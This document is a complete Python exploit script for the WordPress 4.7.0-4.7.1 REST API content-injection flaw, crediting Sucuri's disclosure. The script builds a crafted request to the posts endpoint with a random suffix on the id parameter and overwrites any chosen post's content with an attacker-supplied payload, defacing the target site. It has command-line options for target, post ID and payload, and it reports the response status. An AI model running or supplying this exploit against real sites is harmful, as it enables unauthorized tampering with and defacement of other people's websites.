#!/usr/bin/env python ''' WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit @dustyfresh Date: 02-01-2017 Original vuln disclosed by Sucuri's research team Reference: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html https://wpvulndb.com/vulnerabilities/8734 https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html https://blog.cloudflare.com/protecting-everyone-from-wordpress-content-injection/ ''' import requests from fake_useragent import UserAgent import argparse import urllib.parse import random import string def attack(target, postID, payload): ua = { 'user-agent': UserAgent().random } uwotm8 = ''.join([random.choice(string.ascii_letters) for n in range(8)]) sploit_api = 'http://{}/index.php?rest_route=/wp/v2/posts/{}&id={}{}&content={}'.format(target, postID, postID, uwotm8, payload) attack = requests.post(sploit_api, data = {}, headers=ua, verify=False) if attack.status_code == 200: print('Payload sent to {} with 200 status'.format(target)) else: print('Payload sent to {}, but we are not sure if the attack was successful as {} was the response'.format(target, attack.status_code)) if __name__ == '__main__': parser = argparse.ArgumentParser(description='WordPress 4.7.0-4.7.1 REST API Post privilege escalation / defacement exploit') parser.add_argument('--target', '-t', type=str, required=True, help='Post ID in which the payload will be applied') parser.add_argument('--postID', '-pid', type=str, required=True, help='Post ID in which the payload will be applied') parser.add_argument('--payload', '-p', type=str, required=True, help='What you would like to replace the post with') args = parser.parse_args() target = args.target postID = args.postID payload = urllib.parse.quote_plus(args.payload) attack(target, postID, payload)